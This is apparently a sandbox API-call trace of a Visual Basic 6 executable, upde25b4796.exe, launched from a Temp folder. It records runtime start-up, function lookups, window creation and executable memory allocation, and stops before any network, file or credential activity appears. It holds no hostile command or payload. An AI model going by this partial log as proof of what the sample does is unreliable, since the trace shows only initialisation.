[0318.098] lstrcpyA (in: lpString1=0x72a4ebf0, lpString2="VBENLR98.CHM" | out: lpString1="VBENLR98.CHM") returned="VBENLR98.CHM" [0318.098] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18fd90, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\upde25b4796.exe")) returned 0x34 [0318.098] GetModuleFileNameA (in: hModule=0x72940000, lpFilename=0x18fc8c, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MSVBVM60.DLL" (normalized: "c:\\windows\\system32\\msvbvm60.dll")) returned 0x20 [0318.098] lstrcpynA (in: lpString1=0x18fb70, lpString2="C:\\Windows\\system32\\MSVBVM60.DLL", iMaxLength=260 | out: lpString1="C:\\Windows\\system32\\MSVBVM60.DLL") returned="C:\\Windows\\system32\\MSVBVM60.DLL" [0318.098] lstrlenA (lpString="C:\\Windows\\system32\\MSVBVM60.DLL") returned 32 [0318.098] lstrcpyA (in: lpString1=0x26d17b0, lpString2="C:\\Windows\\system32\\MSVBVM60.DLL" | out: lpString1="C:\\Windows\\system32\\MSVBVM60.DLL") returned="C:\\Windows\\system32\\MSVBVM60.DLL" [0318.098] LCMapStringA (in: Locale=0x409, dwMapFlags=0x200, lpSrcStr="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe", cchSrc=-1, lpDestStr=0x18fb50, cchDest=260 | out: lpDestStr="C:\\USERS\\AETADZJZ\\APPDATA\\LOCAL\\TEMP\\UPDE25B4796.EXE") returned 53 [0318.099] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x18fc54, dwRevision=0x1 | out: pSecurityDescriptor=0x18fc54) returned 1 [0318.099] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0x18fc54, bDaclPresent=1, pDacl=0x0, bDaclDefaulted=0 | out: pSecurityDescriptor=0x18fc54) returned 1 [0318.099] CreateSemaphoreA (lpSemaphoreAttributes=0x18fc68, lInitialCount=0, lMaximumCount=2147483647, lpName="C:?USERS?AETADZJZ?APPDATA?LOCAL?TEMP?UPDE25B4796.EXE") returned 0x90 [0318.099] GetLastError () returned 0x0 [0318.099] GetVersionExA (in: lpVersionInformation=0x18fbcc*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18fbcc*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0318.099] OleInitialize (pvReserved=0x0) returned 0x0 [0318.103] OaBuildVersion () returned 0x321396 [0318.104] LoadLibraryA (lpLibFileName="OLEAUT32.DLL") returned 0x761b0000 [0318.104] GetLastError () returned 0x0 [0318.104] GetProcAddress (hModule=0x761b0000, lpProcName="OleLoadPictureEx") returned 0x762170a1 [0318.104] RegisterClipboardFormatA (lpszFormat="Link") returned 0xc0de [0318.104] RegisterClipboardFormatA (lpszFormat="Rich Text Format") returned 0xc0ae [0318.104] GetClassInfoA (in: hInstance=0x72940000, lpClassName="VBFocusRT6", lpWndClass=0x18fc34 | out: lpWndClass=0x18fc34) returned 0 [0318.104] RegisterClassA (lpWndClass=0x18fc34) returned 0xc0e1 [0318.104] GetClassInfoA (in: hInstance=0x72940000, lpClassName="VBBubbleRT6", lpWndClass=0x18fc34 | out: lpWndClass=0x18fc34) returned 0 [0318.104] RegisterClassA (lpWndClass=0x18fc34) returned 0xc108 [0318.104] GetUserDefaultLCID () returned 0x409 [0318.104] GetSystemInfo (in: lpSystemInfo=0x18fbf4 | out: lpSystemInfo=0x18fbf4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0318.104] VirtualAlloc (lpAddress=0x0, dwSize=0x10000, flAllocationType=0x2000, flProtect=0x4) returned 0x210000 [0318.104] VirtualAlloc (lpAddress=0x210000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0318.105] VirtualAlloc (lpAddress=0x210000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0318.105] VirtualAlloc (lpAddress=0x210000, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0318.105] VirtualAlloc (lpAddress=0x210000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0318.105] VirtualAlloc (lpAddress=0x210000, dwSize=0x5000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0318.105] VirtualAlloc (lpAddress=0x210000, dwSize=0x6000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0318.105] VirtualProtect (in: lpAddress=0x210000, dwSize=0x6000, flNewProtect=0x20, lpflOldProtect=0x18fc50 | out: lpflOldProtect=0x18fc50*=0x4) returned 1 [0318.105] GetCurrentProcess () returned 0xffffffff [0318.105] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x210000, dwSize=0x6000) returned 1 [0318.105] GlobalAddAtomA (lpString="VBDisabled") returned 0xc01e [0318.105] GetVersion () returned 0x1db10106 [0318.105] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x761b0000 [0318.105] GetProcAddress (hModule=0x761b0000, lpProcName="DispCallFunc") returned 0x761c3dcf [0318.105] GetProcAddress (hModule=0x761b0000, lpProcName="LoadTypeLibEx") returned 0x761c07b7 [0318.105] GetProcAddress (hModule=0x761b0000, lpProcName="UnRegisterTypeLib") returned 0x761e1ca9 [0318.106] GetProcAddress (hModule=0x761b0000, lpProcName="CreateTypeLib2") returned 0x761c8e70 [0318.106] GetProcAddress (hModule=0x761b0000, lpProcName="VarDateFromUdate") returned 0x761c7684 [0318.106] GetProcAddress (hModule=0x761b0000, lpProcName="VarUdateFromDate") returned 0x761ccc98 [0318.106] GetProcAddress (hModule=0x761b0000, lpProcName="GetAltMonthNames") returned 0x761f903a [0318.106] GetProcAddress (hModule=0x761b0000, lpProcName="VarNumFromParseNum") returned 0x761c6231 [0318.106] GetProcAddress (hModule=0x761b0000, lpProcName="VarParseNumFromStr") returned 0x761c5fea [0318.106] GetProcAddress (hModule=0x761b0000, lpProcName="VarDecFromR4") returned 0x761d3f94 [0318.106] GetProcAddress (hModule=0x761b0000, lpProcName="VarDecFromR8") returned 0x761d4e9e [0318.106] GetProcAddress (hModule=0x761b0000, lpProcName="VarDecFromDate") returned 0x761fdb72 [0318.106] GetProcAddress (hModule=0x761b0000, lpProcName="VarDecFromI4") returned 0x761e2a8c [0318.106] GetProcAddress (hModule=0x761b0000, lpProcName="VarDecFromCy") returned 0x761fd737 [0318.106] GetProcAddress (hModule=0x761b0000, lpProcName="VarR4FromDec") returned 0x761fe015 [0318.106] GetProcAddress (hModule=0x761b0000, lpProcName="GetRecordInfoFromTypeInfo") returned 0x761fcc3d [0318.106] GetProcAddress (hModule=0x761b0000, lpProcName="GetRecordInfoFromGuids") returned 0x761fd1c4 [0318.106] GetProcAddress (hModule=0x761b0000, lpProcName="SafeArrayGetRecordInfo") returned 0x761fd48c [0318.106] GetProcAddress (hModule=0x761b0000, lpProcName="SafeArraySetRecordInfo") returned 0x761fd4c6 [0318.107] GetProcAddress (hModule=0x761b0000, lpProcName="SafeArrayGetIID") returned 0x761fd509 [0318.107] GetProcAddress (hModule=0x761b0000, lpProcName="SafeArraySetIID") returned 0x761ce7bb [0318.107] GetProcAddress (hModule=0x761b0000, lpProcName="SafeArrayCopyData") returned 0x761ce496 [0318.107] GetProcAddress (hModule=0x761b0000, lpProcName="SafeArrayAllocDescriptorEx") returned 0x761cddf1 [0318.107] GetProcAddress (hModule=0x761b0000, lpProcName="SafeArrayCreateEx") returned 0x761fd53f [0318.107] GetProcAddress (hModule=0x761b0000, lpProcName="VarFormat") returned 0x76202055 [0318.107] GetProcAddress (hModule=0x761b0000, lpProcName="VarFormatDateTime") returned 0x762020ea [0318.107] GetProcAddress (hModule=0x761b0000, lpProcName="VarFormatNumber") returned 0x76202151 [0318.107] GetProcAddress (hModule=0x761b0000, lpProcName="VarFormatPercent") returned 0x762021f5 [0318.107] GetProcAddress (hModule=0x761b0000, lpProcName="VarFormatCurrency") returned 0x76202288 [0318.107] GetProcAddress (hModule=0x761b0000, lpProcName="VarWeekdayName") returned 0x76202335 [0318.107] GetProcAddress (hModule=0x761b0000, lpProcName="VarMonthName") returned 0x762023d5 [0318.107] GetProcAddress (hModule=0x761b0000, lpProcName="VarAdd") returned 0x761d5934 [0318.107] GetProcAddress (hModule=0x761b0000, lpProcName="VarAnd") returned 0x761d5a98 [0318.107] GetProcAddress (hModule=0x761b0000, lpProcName="VarCat") returned 0x761d59b4 [0318.107] GetProcAddress (hModule=0x761b0000, lpProcName="VarDiv") returned 0x7622e405 [0318.107] GetProcAddress (hModule=0x761b0000, lpProcName="VarEqv") returned 0x7622ef07 [0318.108] GetProcAddress (hModule=0x761b0000, lpProcName="VarIdiv") returned 0x7622f00a [0318.108] GetProcAddress (hModule=0x761b0000, lpProcName="VarImp") returned 0x7622ef47 [0318.108] GetProcAddress (hModule=0x761b0000, lpProcName="VarMod") returned 0x7622f15e [0318.108] GetProcAddress (hModule=0x761b0000, lpProcName="VarMul") returned 0x7622dbd4 [0318.108] GetProcAddress (hModule=0x761b0000, lpProcName="VarOr") returned 0x7622ecfa [0318.108] GetProcAddress (hModule=0x761b0000, lpProcName="VarPow") returned 0x7622ea66 [0318.108] GetProcAddress (hModule=0x761b0000, lpProcName="VarSub") returned 0x7622d332 [0318.108] GetProcAddress (hModule=0x761b0000, lpProcName="VarXor") returned 0x7622ee2e [0318.108] GetProcAddress (hModule=0x761b0000, lpProcName="VarAbs") returned 0x7622ca11 [0318.108] GetProcAddress (hModule=0x761b0000, lpProcName="VarFix") returned 0x7622cc5f [0318.108] GetProcAddress (hModule=0x761b0000, lpProcName="VarInt") returned 0x7622cde7 [0318.108] GetProcAddress (hModule=0x761b0000, lpProcName="VarNeg") returned 0x7622c802 [0318.108] GetProcAddress (hModule=0x761b0000, lpProcName="VarNot") returned 0x7622ec66 [0318.108] GetProcAddress (hModule=0x761b0000, lpProcName="VarRound") returned 0x7622d155 [0318.108] GetProcAddress (hModule=0x761b0000, lpProcName="VarCmp") returned 0x761cb0dc [0318.108] GetProcAddress (hModule=0x761b0000, lpProcName="VarDecAdd") returned 0x761e5f3e [0318.108] GetProcAddress (hModule=0x761b0000, lpProcName="VarDecCmp") returned 0x761d4fd0 [0318.108] GetProcAddress (hModule=0x761b0000, lpProcName="VarBstrCat") returned 0x761d0d2c [0318.109] GetProcAddress (hModule=0x761b0000, lpProcName="VarCyMulI4") returned 0x761e59ed [0318.109] GetProcAddress (hModule=0x761b0000, lpProcName="VarBstrCmp") returned 0x761bf8b8 [0318.109] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x75ae0000 [0318.109] GetProcAddress (hModule=0x75ae0000, lpProcName="CoCreateInstanceEx") returned 0x75b29d4e [0318.109] GetProcAddress (hModule=0x75ae0000, lpProcName="CLSIDFromProgIDEx") returned 0x75af0782 [0318.109] GetSystemMetrics (nIndex=42) returned 0 [0318.109] CoGetMalloc (in: dwMemContext=0x1, ppMalloc=0x72a4e688 | out: ppMalloc=0x72a4e688*=0x75c266bc) returned 0x0 [0318.109] IMalloc:Alloc (This=0x75c266bc, cb=0x4) returned 0x508d10 [0318.109] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18f968, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\upde25b4796.exe")) returned 0x34 [0318.109] lstrcatA (in: lpString1="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe", lpString2=".cfg" | out: lpString1="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe.cfg") returned="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe.cfg" [0318.109] SetLastError (dwErrCode=0x0) [0318.109] SearchPathA (in: lpPath=0x0, lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe.cfg", lpExtension=0x0, nBufferLength=0x103, lpBuffer=0x18f864, lpFilePart=0x18f838 | out: lpBuffer="|ú\x18", lpFilePart=0x18f838) returned 0x0 [0318.109] SetLastError (dwErrCode=0x2) [0318.109] GetLastError () returned 0x2 [0318.109] lstrcmpiA (lpString1="upde25b4796", lpString2="MTX") returned 1 [0318.109] lstrcmpiA (lpString1="upde25b4796", lpString2="DLLHOST") returned 1 [0318.109] lstrcmpiA (lpString1="upde25b4796", lpString2="INETINFO") returned 1 [0318.109] lstrcmpiA (lpString1="upde25b4796", lpString2="W3WP") returned -1 [0318.109] lstrcmpiA (lpString1="upde25b4796", lpString2="ASPNET_WP") returned 1 [0318.110] lstrcmpiA (lpString1="upde25b4796", lpString2="DLLHST3G") returned 1 [0318.110] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18f95c, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\upde25b4796.exe")) returned 0x34 [0318.110] lstrcmpiA (lpString1="upde25b4796", lpString2="IEXPLORE") returned 1 [0318.110] LoadLibraryA (lpLibFileName="SXS.DLL") returned 0x74e30000 [0318.111] GetLastError () returned 0x0 [0318.111] GetProcAddress (hModule=0x74e30000, lpProcName="SxsOleAut32MapIIDOrCLSIDToTypeLibrary") returned 0x74e77685 [0318.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18feac, cbMultiByte=-1, lpWideCharStr=0x18fea8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0318.111] CoRegisterMessageFilter (in: lpMessageFilter=0x26d2054, lplpMessageFilter=0x26d205c | out: lplpMessageFilter=0x26d205c*=0x0) returned 0x0 [0318.111] IUnknown:AddRef (This=0x26d2054) returned 0x2 [0318.111] GetClassInfoExA (in: hInstance=0x72940000, lpszClass="ThunderRT6Main", lpwcx=0x18fe78 | out: lpwcx=0x18fe78) returned 0 [0318.111] LoadIconA (hInstance=0x400000, lpIconName=0x1) returned 0x20121 [0318.112] GetModuleHandleA (lpModuleName="USER32") returned 0x758c0000 [0318.112] GetProcAddress (hModule=0x758c0000, lpProcName="GetSystemMetrics") returned 0x758d7d2f [0318.112] GetProcAddress (hModule=0x758c0000, lpProcName="MonitorFromWindow") returned 0x758e3150 [0318.112] GetProcAddress (hModule=0x758c0000, lpProcName="MonitorFromRect") returned 0x758fe7a0 [0318.112] GetProcAddress (hModule=0x758c0000, lpProcName="MonitorFromPoint") returned 0x758e5281 [0318.112] GetProcAddress (hModule=0x758c0000, lpProcName="EnumDisplayMonitors") returned 0x758e451a [0318.112] GetProcAddress (hModule=0x758c0000, lpProcName="GetMonitorInfoA") returned 0x758e4413 [0318.112] GetSystemMetrics (nIndex=0) returned 1440 [0318.112] GetSystemMetrics (nIndex=78) returned 1440 [0318.112] GetSystemMetrics (nIndex=1) returned 900 [0318.112] GetSystemMetrics (nIndex=79) returned 900 [0318.112] GetSystemMetrics (nIndex=50) returned 16 [0318.112] GetSystemMetrics (nIndex=49) returned 16 [0318.112] LoadImageA (hInst=0x400000, name=0x1, type=0x1, cx=16, cy=16, fuLoad=0x0) returned 0x30123 [0318.112] RegisterClassExA (param_1=0x18fe78) returned 0x8ec0e0 [0318.112] CreateWindowExA (dwExStyle=0x80, lpClassName="ThunderRT6Main", lpWindowName=0x0, dwStyle=0x80090000, X=-2147483648, Y=-2147483648, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x2010a [0318.113] NtdllDefWindowProc_A (hWnd=0x2010a, Msg=0x81, wParam=0x0, lParam=0x18fa5c) returned 0x1 [0318.113] NtdllDefWindowProc_A (hWnd=0x2010a, Msg=0x83, wParam=0x0, lParam=0x18fa48) returned 0x0 [0318.113] NtdllDefWindowProc_A (hWnd=0x2010a, Msg=0x1, wParam=0x0, lParam=0x18fa5c) returned 0x0 [0318.113] NtdllDefWindowProc_A (hWnd=0x2010a, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0318.113] NtdllDefWindowProc_A (hWnd=0x2010a, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0318.113] MonitorFromWindow (hwnd=0x2010a, dwFlags=0x2) returned 0x10001 [0318.113] GetMonitorInfoA (in: hMonitor=0x10001, lpmi=0x18fe80 | out: lpmi=0x18fe80) returned 1 [0318.114] SetWindowPos (hWnd=0x2010a, hWndInsertAfter=0x0, X=720, Y=450, cx=0, cy=0, uFlags=0x1d) returned 1 [0318.114] NtdllDefWindowProc_A (hWnd=0x2010a, Msg=0x46, wParam=0x0, lParam=0x18fe20) returned 0x0 [0318.114] NtdllDefWindowProc_A (hWnd=0x2010a, Msg=0x47, wParam=0x0, lParam=0x18fe20) returned 0x0 [0318.114] NtdllDefWindowProc_A (hWnd=0x2010a, Msg=0x3, wParam=0x0, lParam=0x1c202d0) returned 0x0 [0318.114] ShowWindow (hWnd=0x2010a, nCmdShow=4) returned 0 [0318.114] NtdllDefWindowProc_A (hWnd=0x2010a, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0318.115] NtdllDefWindowProc_A (hWnd=0x2010a, Msg=0x46, wParam=0x0, lParam=0x18fe34) returned 0x0 [0318.115] NtdllDefWindowProc_A (hWnd=0x2010a, Msg=0x47, wParam=0x0, lParam=0x18fe34) returned 0x0 [0318.115] GetWindowThreadProcessId (in: hWnd=0x2010a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x548 [0318.115] VirtualQuery (in: lpAddress=0x18fea8, lpBuffer=0x18fe8c, dwLength=0x1c | out: lpBuffer=0x18fe8c*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0318.115] GetUserDefaultLCID () returned 0x409 [0318.115] IsValidCodePage (CodePage=0x3a4) returned 1 [0318.115] IsValidCodePage (CodePage=0x3b5) returned 1 [0318.115] IsValidCodePage (CodePage=0x3b6) returned 1 [0318.115] IsValidCodePage (CodePage=0x3a8) returned 1 [0318.117] GetUserDefaultLangID () returned 0x409 [0318.117] GetSystemDefaultLangID () returned 0x500409 [0318.117] GetSystemMetrics (nIndex=42) returned 0 [0318.117] IMalloc:Alloc (This=0x75c266bc, cb=0xa8) returned 0x50d400 [0318.117] IMalloc:GetSize (This=0x75c266bc, pv=0x50d400) returned 0xa8 [0318.117] IMalloc:Alloc (This=0x75c266bc, cb=0xc) returned 0x50ca88 [0318.117] GetCurrentThreadId () returned 0x548 [0318.117] IMalloc:Alloc (This=0x75c266bc, cb=0x3c) returned 0x509c20 [0318.117] IMalloc:Alloc (This=0x75c266bc, cb=0x1c) returned 0x5094e8 [0318.117] RegOpenKeyA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\VBA\\Monitors", phkResult=0x18fe74 | out: phkResult=0x18fe74*=0x0) returned 0x2 [0318.118] IMalloc:Alloc (This=0x75c266bc, cb=0x1c) returned 0x509510 [0318.118] GetCurrentThreadId () returned 0x548 [0318.118] SetWindowsHookExA (idHook=-1, lpfn=0x729a1e09, hmod=0x0, dwThreadId=0x548) returned 0x200e9 [0318.118] GetClassInfoA (in: hInstance=0x72940000, lpClassName="VBMsoStdCompMgr", lpWndClass=0x18fdcc | out: lpWndClass=0x18fdcc) returned 0 [0318.118] RegisterClassA (lpWndClass=0x18fdcc) returned 0x98c0e2 [0318.118] CreateWindowExA (dwExStyle=0x0, lpClassName="VBMsoStdCompMgr", lpWindowName=0x0, dwStyle=0x80000000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x2010c [0318.118] NtdllDefWindowProc_A (hWnd=0x2010c, Msg=0x81, wParam=0x0, lParam=0x18fa08) returned 0x1 [0318.118] NtdllDefWindowProc_A (hWnd=0x2010c, Msg=0x83, wParam=0x0, lParam=0x18f9f4) returned 0x0 [0318.118] NtdllDefWindowProc_A (hWnd=0x2010c, Msg=0x1, wParam=0x0, lParam=0x18fa08) returned 0x0 [0318.118] NtdllDefWindowProc_A (hWnd=0x2010c, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0318.118] NtdllDefWindowProc_A (hWnd=0x2010c, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0318.118] SetWindowLongA (hWnd=0x2010c, nIndex=0, dwNewLong=40706204) returned 0 [0318.118] RegisterClipboardFormatA (lpszFormat="Object Descriptor") returned 0xc00e [0318.118] RegisterClipboardFormatA (lpszFormat="Link Source Descriptor") returned 0xc00f [0318.118] RegisterClipboardFormatA (lpszFormat="Embed Source") returned 0xc00b [0318.118] RegisterClipboardFormatA (lpszFormat="Embedded Object") returned 0xc00a [0318.118] RegisterClipboardFormatA (lpszFormat="Link Source") returned 0xc00d [0318.118] RegisterClipboardFormatA (lpszFormat="OwnerLink") returned 0xc003 [0318.118] RegisterClipboardFormatA (lpszFormat="FileName") returned 0xc006 [0318.118] CreateCompatibleDC (hdc=0x0) returned 0x220107c0 [0318.118] GetCurrentObject (hdc=0x220107c0, type=0x7) returned 0x185000f [0318.118] CreateWindowExA (dwExStyle=0x0, lpClassName="VBFocusRT6", lpWindowName=0x0, dwStyle=0x40000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x2010a, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x20124 [0318.118] NtdllDefWindowProc_A (hWnd=0x20124, Msg=0x81, wParam=0x0, lParam=0x18fa98) returned 0x1 [0318.119] NtdllDefWindowProc_A (hWnd=0x20124, Msg=0x83, wParam=0x0, lParam=0x18fa84) returned 0x0 [0318.119] NtdllDefWindowProc_A (hWnd=0x20124, Msg=0x1, wParam=0x0, lParam=0x18fa98) returned 0x0 [0318.119] NtdllDefWindowProc_A (hWnd=0x20124, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0318.119] NtdllDefWindowProc_A (hWnd=0x20124, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0318.119] NtdllDefWindowProc_A (hWnd=0x2010a, Msg=0x210, wParam=0x1, lParam=0x20124) returned 0x0 [0318.119] GetCurrentThreadId () returned 0x548 [0318.119] GetCurrentThreadId () returned 0x548 [0318.119] lstrlenA (lpString="VB") returned 2 [0318.119] lstrlenA (lpString="CommandButton") returned 13 [0318.120] lstrlenA (lpString="VB") returned 2 [0318.120] lstrlenA (lpString="Printer") returned 7 [0318.120] lstrlenA (lpString="VB") returned 2 [0318.120] lstrlenA (lpString="Form") returned 4 [0318.120] lstrlenA (lpString="VB") returned 2 [0318.120] lstrlenA (lpString="Screen") returned 6 [0318.120] lstrlenA (lpString="VB") returned 2 [0318.120] lstrlenA (lpString="Clipboard") returned 9 [0318.120] lstrlenA (lpString="VB") returned 2 [0318.120] lstrlenA (lpString="MDIForm") returned 7 [0318.121] lstrlenA (lpString="VB") returned 2 [0318.121] lstrlenA (lpString="App") returned 3 [0318.121] lstrlenA (lpString="VB") returned 2 [0318.121] lstrlenA (lpString="UserControl") returned 11 [0318.121] lstrlenA (lpString="VB") returned 2 [0318.121] lstrlenA (lpString="PropertyPage") returned 12 [0318.121] lstrcmpiA (lpString1="VB.MDIForm", lpString2="VB.PropertyPage") returned -1 [0318.121] lstrlenA (lpString="VB") returned 2 [0318.121] lstrlenA (lpString="UserDocument") returned 12 [0318.122] GetCurrentThreadId () returned 0x548 [0318.122] GetCurrentThreadId () returned 0x548 [0318.122] GetCurrentThreadId () returned 0x548 [0318.122] GetCurrentThreadId () returned 0x548 [0318.122] GetCurrentThreadId () returned 0x548 [0318.122] GetCurrentThreadId () returned 0x548 [0318.122] GetCurrentThreadId () returned 0x548 [0318.122] GetCurrentThreadId () returned 0x548 [0318.123] GetCurrentThreadId () returned 0x548 [0318.123] GetCurrentThreadId () returned 0x548 [0318.123] lstrlenA (lpString="VB") returned 2 [0318.123] lstrlenA (lpString="PictureBox") returned 10 [0318.123] lstrlenA (lpString="VB") returned 2 [0318.123] lstrlenA (lpString="Label") returned 5 [0318.123] lstrlenA (lpString="VB") returned 2 [0318.123] lstrlenA (lpString="TextBox") returned 7 [0318.124] lstrlenA (lpString="VB") returned 2 [0318.124] lstrlenA (lpString="Frame") returned 5 [0318.124] lstrlenA (lpString="VB") returned 2 [0318.124] lstrlenA (lpString="CheckBox") returned 8 [0318.124] lstrlenA (lpString="VB") returned 2 [0318.124] lstrlenA (lpString="OptionButton") returned 12 [0318.124] lstrlenA (lpString="VB") returned 2 [0318.124] lstrlenA (lpString="ComboBox") returned 8 [0318.125] lstrlenA (lpString="VB") returned 2 [0318.125] lstrlenA (lpString="ListBox") returned 7 [0318.125] lstrlenA (lpString="VB") returned 2 [0318.125] lstrlenA (lpString="HScrollBar") returned 10 [0318.125] lstrlenA (lpString="VB") returned 2 [0318.125] lstrlenA (lpString="VScrollBar") returned 10 [0318.125] lstrlenA (lpString="VB") returned 2 [0318.125] lstrlenA (lpString="Timer") returned 5 [0318.126] lstrlenA (lpString="VB") returned 2 [0318.126] lstrlenA (lpString="DriveListBox") returned 12 [0318.126] lstrlenA (lpString="VB") returned 2 [0318.126] lstrlenA (lpString="DirListBox") returned 10 [0318.126] lstrlenA (lpString="VB") returned 2 [0318.126] lstrlenA (lpString="FileListBox") returned 11 [0318.126] lstrlenA (lpString="VB") returned 2 [0318.126] lstrlenA (lpString="Menu") returned 4 [0318.127] lstrlenA (lpString="VB") returned 2 [0318.127] lstrlenA (lpString="Shape") returned 5 [0318.127] lstrlenA (lpString="VB") returned 2 [0318.127] lstrlenA (lpString="Line") returned 4 [0318.127] lstrlenA (lpString="VB") returned 2 [0318.127] lstrlenA (lpString="Image") returned 5 [0318.127] lstrlenA (lpString="VB") returned 2 [0318.127] lstrlenA (lpString="Data") returned 4 [0318.128] lstrlenA (lpString="VB") returned 2 [0318.128] lstrlenA (lpString="OLE") returned 3 [0318.128] IMalloc:Alloc (This=0x75c266bc, cb=0x64) returned 0x508d20 [0318.128] IMalloc:Alloc (This=0x75c266bc, cb=0x64) returned 0x50d4b0 [0318.128] IMalloc:Alloc (This=0x75c266bc, cb=0x64) returned 0x50d520 [0318.128] IMalloc:Alloc (This=0x75c266bc, cb=0x64) returned 0x50d590 [0318.128] IMalloc:Alloc (This=0x75c266bc, cb=0x64) returned 0x50d600 [0318.128] IMalloc:Alloc (This=0x75c266bc, cb=0xc) returned 0x50caa0 [0318.128] IMalloc:Alloc (This=0x75c266bc, cb=0x7c) returned 0x50d670 [0318.128] IMalloc:GetSize (This=0x75c266bc, pv=0x50d670) returned 0x7c [0318.128] IMalloc:Alloc (This=0x75c266bc, cb=0x20) returned 0x509718 [0318.128] GetCurrentThreadId () returned 0x548 [0318.128] GetCurrentThreadId () returned 0x548 [0318.128] IMalloc:Alloc (This=0x75c266bc, cb=0x1c) returned 0x509740 [0318.129] VirtualProtect (in: lpAddress=0x210000, dwSize=0x6000, flNewProtect=0x4, lpflOldProtect=0x18fdf8 | out: lpflOldProtect=0x18fdf8*=0x20) returned 1 [0318.129] GetCurrentProcess () returned 0xffffffff [0318.129] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x210000, dwSize=0x6000) returned 1 [0318.129] VirtualAlloc (lpAddress=0x210000, dwSize=0x7000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0318.129] VirtualAlloc (lpAddress=0x210000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0318.129] VirtualAlloc (lpAddress=0x210000, dwSize=0x9000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0318.129] VirtualAlloc (lpAddress=0x210000, dwSize=0xa000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0318.129] VirtualProtect (in: lpAddress=0x210000, dwSize=0xa000, flNewProtect=0x20, lpflOldProtect=0x18fdf8 | out: lpflOldProtect=0x18fdf8*=0x4) returned 1 [0318.129] GetCurrentProcess () returned 0xffffffff [0318.129] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x210000, dwSize=0xa000) returned 1 [0318.129] GetCurrentThreadId () returned 0x548 [0318.134] SetWindowTextA (hWnd=0x2010a, lpString="Ngtede") returned 1 [0318.134] NtdllDefWindowProc_A (hWnd=0x2010a, Msg=0xc, wParam=0x0, lParam=0x18fd6c) returned 0x1 [0318.134] RegOpenKeyA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\VBA\\Monitors", phkResult=0x18fd54 | out: phkResult=0x18fd54*=0x0) returned 0x2 [0318.135] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0318.135] VirtualQuery (in: lpAddress=0x18f780, lpBuffer=0x18f764, dwLength=0x1c | out: lpBuffer=0x18f764*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0318.135] IMalloc:Alloc (This=0x75c266bc, cb=0x68) returned 0x50e6f8 